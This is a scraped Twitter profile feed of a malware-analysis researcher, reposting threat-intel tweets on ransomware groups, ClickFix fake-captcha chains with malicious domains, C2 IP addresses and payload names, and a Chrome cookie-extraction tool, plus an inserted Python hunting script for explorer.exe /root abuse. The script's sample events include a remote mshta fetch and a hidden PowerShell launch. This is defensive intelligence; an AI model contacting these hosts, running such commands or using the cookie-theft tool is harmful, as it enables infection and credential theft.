Max_Malyutin (@max_mal_)'s Twitter Profile
Max_Malyutin

@max_mal_

Threat Researcher, Blue Team, DFIR, Malware Analysis, and Reverse Engineering.
“⚔️What do we say to God of malware, Not today⚔️”

ID: 1066056357672030208

Link: https://il.linkedin.com/in/max-malyutin-299689168
Joined: 23-11-2018 19:50:16

9.9K Tweets

12.12K Followers

312 Following

John Hammond (@_johnhammond)

We wrote up what Huntress (@HuntressLabs) has been seeing for the CrushFTP authentication bypass: CVE-2025-31161 (or CVE-2025-2825, whichever side of the bed you woke up on) leading to MeshCentral agents, AnyDesk, and neato "TelegramBot" malware. Patch plz! ✌️ huntress.com/blog/crushftp-…
DarkFeed (@ido_cohen2)

🚨 Weekly Ransomware Threat Update - Top Groups Remain Active 🚨

Here's a look at the 8 most active ransomware groups of 2025, as of this week:

🔷RansomHub – 235 attacks 🔺
🔷CLOP – 230 attacks 🔻
🔷Akira – 162 attacks
🔷Qilin – 121 attacks
🔷Lynx – 104 attacks
🔷Play – 93
JAMESWT (@jameswt_wt)

"Please help me with #booking"
#fakecaptcha #clickfix
👇
meteoforecast[.icu
👇
uncanceletion.]world
👇
cdn.jsdelivr.]net/gh/repository-git/q/verif-sec.js
.js change to ps1
👇
MSI 
62 Samples (domains related / hunting)
bazaar.abuse.ch/browse/tag/cdn…
AnyRun
app.any.run/tasks/cebf812b…
1/2
Microsoft Threat Intelligence (@msftsecintel)

Human-operated ransomware attacks frequently involve compromising domain controllers, which attackers then use as the primary spreader device — the system responsible for distributing ransomware at scale within a compromised environment. msft.it/6018qFECm

Unit 42 (@unit42_intel)

During the past few months, criminals have registered several tax return-themed domains. These domains host #phishing and #scam sites that take advantage of #TaxReturn season. Stay alert! Verify sites that claim to be the IRS or tax services. More info at bit.ly/4j3ECWW
Joe Roosen (@jroosen)

This was some fun research for our team to work on! It really gives you a good introspective into how Black Basta functioned! spycloud.com/blog/digesting…

JAMESWT (@jameswt_wt)

#booking #fakecaptcha #clickfix > #asyncrat
👇
partlet-id739847].com
👇
booking.partners-id739847.]com
👇
⛔️185.39.17.70/zgrnf/
fresh.html (ps1)
nums.bat
pixel.exe
qxm.exe

✅Samples
bazaar.abuse.ch/browse/tag/185…
✅AnyRun
app.any.run/tasks/5b45ea5e…
JAMESWT (@jameswt_wt)

#booking #fakecaptcha #clickfix
👇
⛔️booking-refguestitem-09064111.]com
👇
⛔️demopark.]com.]tr/rayidverifications.txt (ps1)
👇
⛔️demopark.]com].tr/GUP.zip (payload)

⛔️C2 185.7.214].3

✅Samples
bazaar.abuse.ch/browse/tag/dem…
✅AnyRun
app.any.run/tasks/1652e2f0…
app.any.run/tasks/e9127307…
BleepingComputer (@bleepincomputer)

Marks & Spencer breach linked to Scattered Spider ransomware attack - Lawrence Abrams bleepingcomputer.com/news/security/…

Virus Bulletin (@virusbtn)

The DFIR Report has published data from an open directory associated with a ransomware affiliate, likely linked to the Fog ransomware group. The open directory contained tools and scripts for reconnaissance, exploitation, lateral movement, and persistence. thedfirreport.com/2025/04/28/nav…
Alex (@xaitax)

🚀 Just dropped v0.5 of my Chrome App-Bound Encryption Decryption tool! Full user-mode (no admin), all path-validation bypasses, full cookie extraction (JSON 🍪) and stealth DLL injection. Chrome’s ABE is officially broken, works on Chrome, Edge & Brave. Anything else to tackle
Unit 42 (@unit42_intel)

2025-05-22 (Thursday) After reports of the recent #LummaStealer disruption, a campaign we saw distributing Lumma Stealer earlier this week switched to pushing #StealC v2 today. Details at bit.ly/43bEC1M 

#StealCv2 #TimelyThreatIntel
Germán Fernández (@1zrr4h)

#Bumblebee from nir-soft[.]org (x.com/1ZRR4H/status/…).
Botnet: grp0005
C2: 188.40.187.152 (although not flagged by any AV, the IP has been linked to Bumblebee campaigns since approximately April 2024).

Bumblebee has been used in ransomware attacks.

MalwareHunterTeam (@malwrhunterteam)
Wietze (@wietze)

#HuntingTipOfTheDay: explorer.exe /root,"c:/your/file.exe" will spawn your exe from the main explorer.exe, not a new one. This breaks normal process chains. Hunt for explorer.exe with "/root", as well as explorer spawning unusual children (e.g. rundll32, mshta, powershell).
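The two hunts in the tip above, written out as a small detection pass over process-creation events. This is an added example and not Wietze's code: the events are constructed in a Sysmon Event ID 1 style (image, command line, parent image) and are not real telemetry, and the child-process list only reproduces the three binaries the tweet names plus pwsh.exe as my own addition.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# Invented for this example; paths and PIDs are not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE",
     "parent_image": r"C:\Windows\System32\userinit.exe"},
    # The transient explorer.exe from the tip: launched with /root,"<file>".
    {"pid": 5310, "image": r"C:\Windows\explorer.exe",
     "cmdline": r'explorer.exe /root,"C:\Users\Public\update.exe"',
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    # The payload then appears as an ordinary child of the main explorer.exe.
    {"pid": 5322, "image": r"C:\Users\Public\update.exe",
     "cmdline": r'"C:\Users\Public\update.exe"',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 5400, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://example.invalid/page.hta",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 5500, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe"',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 5600, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -File C:\Users\Public\run.ps1",
     "parent_image": r"C:\Windows\explorer.exe"},
    # Same binary, but from a cmd.exe parent: not an explorer child, so not a lead.
    {"pid": 5700, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
]

# Children that rarely descend directly from explorer.exe in normal use.
# rundll32/mshta/powershell are from the tweet; pwsh.exe is an assumption I added.
UNUSUAL_EXPLORER_CHILDREN = {"rundll32.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}

# "/root" as a standalone switch: preceded by start-of-line or whitespace,
# followed by a comma, whitespace or end-of-line. Avoids matching paths
# such as C:\root\docs.
ROOT_SWITCH = re.compile(r"(?:^|\s)/root(?:,|\s|$)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (accepts both separators)."""
    return re.split(r"[\\/]", path)[-1].lower()


def has_root_switch(cmdline: str) -> bool:
    """True when the command line carries the explorer.exe /root switch."""
    return ROOT_SWITCH.search(cmdline) is not None


def hunt(events):
    """Return hunting leads for the two patterns in the tip.

    Each lead is a dict with the rule name, the event PID and a short reason.
    """
    findings = []
    for ev in events:
        image = basename(ev["image"])
        parent = basename(ev["parent_image"])
        # Pattern 1: a (short-lived) explorer.exe launched with /root,"<file>".
        if image == "explorer.exe" and has_root_switch(ev["cmdline"]):
            findings.append({
                "rule": "explorer_root_switch",
                "pid": ev["pid"],
                "reason": f"explorer.exe started with /root: {ev['cmdline']}",
            })
        # Pattern 2: the main explorer.exe spawning scripting/LOLBin children.
        if parent == "explorer.exe" and image in UNUSUAL_EXPLORER_CHILDREN:
            findings.append({
                "rule": "explorer_unusual_child",
                "pid": ev["pid"],
                "reason": f"{image} spawned by explorer.exe: {ev['cmdline']}",
            })
    return findings


if __name__ == "__main__":
    for lead in hunt(SAMPLE_EVENTS):
        print(f"[{lead['rule']}] pid={lead['pid']} {lead['reason']}")
```

Note what the sample shows: the payload (pid 5322) is not flagged at all, because as a child of the main explorer.exe it looks exactly like a user double-clicking a file, which is the point of the tip. The lead is the transient explorer.exe with `/root` on its command line (pid 5310), and separately the mshta and PowerShell children of explorer (pids 5400 and 5600). Both patterns are hunting leads rather than verdicts: `/root` is a documented explorer switch with legitimate uses, so expect to tune on command-line arguments and parent process before alerting.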
DarkFeed (@ido_cohen2)

🎂 Yesterday marked 6 years since the rise of LockBit — one of the most notorious ransomware groups in history.

💀 With over 3,000 confirmed victims, LockBit remains the most prolific ransomware operation to date.
🔥 Now, the group is making headlines again by launching a new